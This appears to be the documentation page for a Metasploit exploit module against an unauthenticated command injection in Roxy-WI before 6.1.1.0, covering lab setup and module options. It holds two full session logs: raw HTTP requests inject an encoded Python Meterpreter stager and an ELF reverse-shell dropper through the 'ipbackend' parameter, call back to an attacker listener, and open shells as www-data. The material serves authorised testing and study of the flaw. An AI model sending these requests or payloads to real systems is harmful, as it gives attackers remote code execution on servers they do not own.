18 KiB
Vulnerable Application
This module exploits an unauthenticated command injection vulnerability in Roxy-WI prior to version 6.1.1.0. Successful exploitation results in remote code execution under the context of the web server user.
Roxy-WI is an interface for managing HAProxy, Nginx and Keepalived servers.
Setup
Roxy-WI requires Python and a web server to run. Please visit following url to find out required python and other packages.
First grab a vulnerable copy of the code from the release pages at https://github.com/hap-wi/roxy-wi/releases. You will likely want to grab version 6.1.0.0 from https://github.com/hap-wi/roxy-wi/archive/refs/tags/v6.1.0.0.tar.gz
Next follow the installation instructions at https://roxy-wi.org/installation.py#manual and be sure to replace apache
with www-data
where applicable if your using Debian or Ubuntu (they call this out in their instructions however
it can be a bit hard to find which is why I'm noting it here).
Once you are done you should have a working copy of Roxy-Wi. Note that for some reason the login page didn't work for me in testing, however everything needed to test this module should be set up and operating as expected.
Verification Steps
- Install the application
- Start msfconsole
- Do:
use exploit/linux/http/roxy_wi_exec
- Set
RHOST
to the address of the target Roxy-WI machine. - Set
LHOST
to the address of your attacking machine. - Run
exploit
- Do:
run
- You should get a shell as the user running the Roxy-WI server.
Targets
0
This executes a Unix command.
1
This uses a Linux dropper to execute code.
Options
TARGETURI
The base path to Roxy-WI. The default value is /
.
Scenarios
Roxy-WI 6.1.0.0 Ubuntu 22.04 GNU/Linux (x86_64) - Apache/2.4.52 / Python 3.10.4 / MySQL 8.0.29 With Unix In-Memory Target
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/linux/http/roxy_wi_exec
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/roxy_wi_exec) > show options
Module options (exploit/linux/http/roxy_wi_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:hos
t:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid
7/metasploit-framework/wiki/Using-Metasploit
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on
. This must be an address on the local machine o
r 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is ran
domly generated)
TARGETURI / yes The URI of the vulnerable instance
URIPATH no The URI to use for this exploit (default is rand
om)
VHOST no HTTP server virtual host
Payload options (cmd/unix/python/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.22.230.145 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Unix (In-Memory)
msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf6 exploit(linux/http/roxy_wi_exec) > set HttpTrace true
HttpTrace => true
msf6 exploit(linux/http/roxy_wi_exec) > run
[*] Started reverse TCP handler on 172.22.230.145:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 127.0.0.1:443 is vulnerable!
####################
# Request:
####################
POST /app/options.py HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
serv=127.0.0.1&ipbackend=%22%3b%20id%20%3b%23&alert_consumer=iufmgha&backend_server=127.0.0.1
####################
# Response:
####################
HTTP/1.1 200 OK
Date: Mon, 25 Jul 2022 18:46:55 GMT
Server: Apache/2.4.52 (Ubuntu)
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
<center><div class="alert alert-danger">Check the config file. Presence section configs and parameter haproxy_save_configs_dir</div>
Content-type: text/html
<center><div class="alert alert-danger">Check the config file. Presence section mysql and parameter enable</div>
Content-type: text/html
<center><div class="alert alert-danger">Check the config file. Presence section mysql and parameter enable</div>
Content-type: text/html
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] 127.0.0.1:443 is vulnerable!
[+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed.
[*] Exploiting...
####################
# Request:
####################
POST /app/options.py HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Content-Length: 760
serv=127.0.0.1&ipbackend=%22%3b%20echo%20exec\%28__import__\%28\%27base64\%27\%29.b64decode\%28__import__\%28\%27codecs\%27\%29.getencoder\%28\%27utf-8\%27\%29\%28\%27aW1wb3J0IHNvY2tldCx6bGliLGJhc2U2NCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE3Mi4yMi4yMzAuMTQ1Jyw0NDQ0KSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc%2bSScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyh6bGliLmRlY29tcHJlc3MoYmFzZTY0LmI2NGRlY29kZShkKSkseydzJzpzfSkK\%27\%29\%5b0\%5d\%29\%29%20%7c%20exec%20%24%28which%20python%20%7c%7c%20which%20python3%20%7c%7c%20which%20python2%29%20-%20%3b%23&alert_consumer=gumovpt&backend_server=127.0.0.1
[*] Sending stage (40164 bytes) to 172.22.230.145
[*] Meterpreter session 1 opened (172.22.230.145:4444 -> 172.22.230.145:41506) at 2022-07-25 13:46:56 -0500
####################
# Response:
####################
No response received
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : gwillcox-Virtual-Machine
OS : Linux 5.15.0-41-generic #44-Ubuntu SMP Wed Jun 22 14:20:53 UTC 2022
Architecture : x64
Meterpreter : python/linux
meterpreter > pwd
/var/www/haproxy-wi/app
meterpreter > ls
Listing: /var/www/haproxy-wi/app
================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100664/rw-rw-r-- 83 fil 2022-06-30 02:43:57 -0500 .htaccess
040755/rwxr-xr-x 4096 dir 2022-07-25 13:36:33 -0500 __pycache__
100775/rwxrwxr-x 12822 fil 2022-06-30 02:43:57 -0500 add.py
040775/rwxrwxr-x 4096 dir 2022-06-30 02:43:57 -0500 certs
100775/rwxrwxr-x 4745 fil 2022-06-30 02:43:57 -0500 config.py
100775/rwxrwxr-x 33194 fil 2022-06-30 02:43:57 -0500 create_db.py
100775/rwxrwxr-x 14945 fil 2022-06-30 02:43:57 -0500 db_model.py
100775/rwxrwxr-x 64688 fil 2022-06-30 02:43:57 -0500 funct.py
100775/rwxrwxr-x 913 fil 2022-06-30 02:43:57 -0500 ha.py
100775/rwxrwxr-x 8544 fil 2022-06-30 02:43:57 -0500 hapservers.py
100775/rwxrwxr-x 3008 fil 2022-06-30 02:43:57 -0500 history.py
100775/rwxrwxr-x 7145 fil 2022-06-30 02:43:57 -0500 login.py
100775/rwxrwxr-x 1696 fil 2022-06-30 02:43:57 -0500 logs.py
100775/rwxrwxr-x 1598 fil 2022-06-30 02:43:57 -0500 metrics.py
100775/rwxrwxr-x 966 fil 2022-06-30 02:43:57 -0500 nettools.py
100775/rwxrwxr-x 181104 fil 2022-06-30 02:43:57 -0500 options.py
100775/rwxrwxr-x 4096 fil 2022-06-30 02:43:57 -0500 overview.py
100775/rwxrwxr-x 1884 fil 2022-06-30 02:43:57 -0500 portscanner.py
100775/rwxrwxr-x 1125 fil 2022-06-30 02:43:57 -0500 provisioning.py
100644/rw-r--r-- 274432 fil 2022-07-25 13:41:13 -0500 roxy-wi.db
100775/rwxrwxr-x 750 fil 2022-06-30 02:43:57 -0500 runtimeapi.py
040775/rwxrwxr-x 4096 dir 2022-06-30 02:43:57 -0500 scripts
100775/rwxrwxr-x 2486 fil 2022-06-30 02:43:57 -0500 sections.py
100775/rwxrwxr-x 1580 fil 2022-06-30 02:43:57 -0500 servers.py
100775/rwxrwxr-x 1826 fil 2022-06-30 02:43:57 -0500 smon.py
100775/rwxrwxr-x 103924 fil 2022-06-30 02:43:57 -0500 sql.py
040775/rwxrwxr-x 4096 dir 2022-06-30 02:43:57 -0500 templates
100775/rwxrwxr-x 1361 fil 2022-06-30 02:43:57 -0500 users.py
100775/rwxrwxr-x 4150 fil 2022-06-30 02:43:57 -0500 versions.py
100775/rwxrwxr-x 2076 fil 2022-06-30 02:43:57 -0500 viewlogs.py
100775/rwxrwxr-x 1150 fil 2022-06-30 02:43:57 -0500 viewsttats.py
100775/rwxrwxr-x 1819 fil 2022-06-30 02:43:57 -0500 waf.py
meterpreter >
Roxy-WI 6.1.0.0 Ubuntu 22.04 GNU/Linux (x86_64) - Apache/2.4.52 / Python 3.10.4 / MySQL 8.0.29 With Linux Dropper Target
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/linux/http/roxy_wi_exec
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/roxy_wi_exec) > show options
Module options (exploit/linux/http/roxy_wi_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:hos
t:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid
7/metasploit-framework/wiki/Using-Metasploit
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on
. This must be an address on the local machine o
r 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is ran
domly generated)
TARGETURI / yes The URI of the vulnerable instance
URIPATH no The URI to use for this exploit (default is rand
om)
VHOST no HTTP server virtual host
Payload options (cmd/unix/python/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.22.230.145 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Unix (In-Memory)
msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf6 exploit(linux/http/roxy_wi_exec) > set HttpTrace true
HttpTrace => true
msf6 exploit(linux/http/roxy_wi_exec) > set Target 1
Target => 1
msf6 exploit(linux/http/roxy_wi_exec) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf6 exploit(linux/http/roxy_wi_exec) > show options
Module options (exploit/linux/http/roxy_wi_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:hos
t:port][...]
RHOSTS 127.0.0.1 yes The target host(s), see https://github.com/rapid
7/metasploit-framework/wiki/Using-Metasploit
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on
. This must be an address on the local machine o
r 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is ran
domly generated)
TARGETURI / yes The URI of the vulnerable instance
URIPATH no The URI to use for this exploit (default is rand
om)
VHOST no HTTP server virtual host
Payload options (linux/x64/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.22.230.145 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 Linux (Dropper)
msf6 exploit(linux/http/roxy_wi_exec) > run
[*] Started reverse TCP handler on 172.22.230.145:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 127.0.0.1:443 is vulnerable!
####################
# Request:
####################
POST /app/options.py HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
serv=127.0.0.1&ipbackend=%22%3b%20id%20%3b%23&alert_consumer=oodqhqe&backend_server=127.0.0.1
####################
# Response:
####################
HTTP/1.1 200 OK
Date: Mon, 25 Jul 2022 19:07:53 GMT
Server: Apache/2.4.52 (Ubuntu)
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
<center><div class="alert alert-danger">Check the config file. Presence section configs and parameter haproxy_save_configs_dir</div>
Content-type: text/html
<center><div class="alert alert-danger">Check the config file. Presence section mysql and parameter enable</div>
Content-type: text/html
<center><div class="alert alert-danger">Check the config file. Presence section mysql and parameter enable</div>
Content-type: text/html
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] 127.0.0.1:443 is vulnerable!
[+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed.
[*] Exploiting...
####################
# Request:
####################
POST /app/options.py HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Content-Length: 939
serv=127.0.0.1&ipbackend=%22%3b%20printf%20%27\177\105\114\106\2\1\1\0\0\0\0\0\0\0\0\0\2\0\76\0\1\0\0\0\170\0\100\0\0\0\0\0\100\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\100\0\70\0\1\0\0\0\0\0\0\0\1\0\0\0\7\0\0\0\0\0\0\0\0\0\0\0\0\0\100\0\0\0\0\0\0\0\100\0\0\0\0\0\372\0\0\0\0\0\0\0\174\1\0\0\0\0\0\0\0\20\0\0\0\0\0\0\110\61\377\152\11\130\231\266\20\110\211\326\115\61\311\152\42\101\132\262\7\17\5\110\205\300\170\121\152\12\101\131\120\152\51\130\231\152\2\137\152\1\136\17\5\110\205\300\170\73\110\227\110\271\2\0\21\134\254\26\346\221\121\110\211\346\152\20\132\152\52\130\17\5\131\110\205\300\171\45\111\377\311\164\30\127\152\43\130\152\0\152\5\110\211\347\110\61\366\17\5\131\131\137\110\205\300\171\307\152\74\130\152\1\137\17\5\136\152\46\132\17\5\110\205\300\170\355\377\346%27%3e%3e/tmp/olXCy%20%3b%20chmod%20%2bx%20/tmp/olXCy%20%3b%20/tmp/olXCy%20%3b%20rm%20-f%20/tmp/olXCy%20%3b%23&alert_consumer=kvlkaqe&backend_server=127.0.0.1
[*] Sending stage (38 bytes) to 172.22.230.145
[*] Command shell session 2 opened (172.22.230.145:4444 -> 172.22.230.145:41508) at 2022-07-25 14:07:59 -0500
i####################
# Response:
####################
No response received
d[*] Command Stager progress - 100.00% done (810/810 bytes)
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
pwd
/var/www/haproxy-wi/app
ls
__pycache__
add.py
certs
config.py
create_db.py
db_model.py
funct.py
ha.py
hapservers.py
history.py
login.py
logs.py
metrics.py
nettools.py
options.py
overview.py
portscanner.py
provisioning.py
roxy-wi.db
runtimeapi.py
scripts
sections.py
servers.py
smon.py
sql.py
templates
users.py
versions.py
viewlogs.py
viewsttats.py
waf.py